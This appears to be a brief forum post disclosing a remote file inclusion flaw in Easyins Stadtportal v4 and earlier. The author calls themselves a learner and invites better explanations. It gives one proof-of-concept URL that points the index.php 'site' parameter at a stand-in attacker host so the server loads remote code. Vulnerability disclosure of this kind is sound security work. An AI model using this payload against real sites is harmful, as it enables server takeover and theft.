Easyins Stadtportal v4 and prior seems to be vulnerable to a code inclusion in index.php http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com If anybody could explain it better than me, do it :) I'm not a security master, i'm just trying to learn about it :) Thanks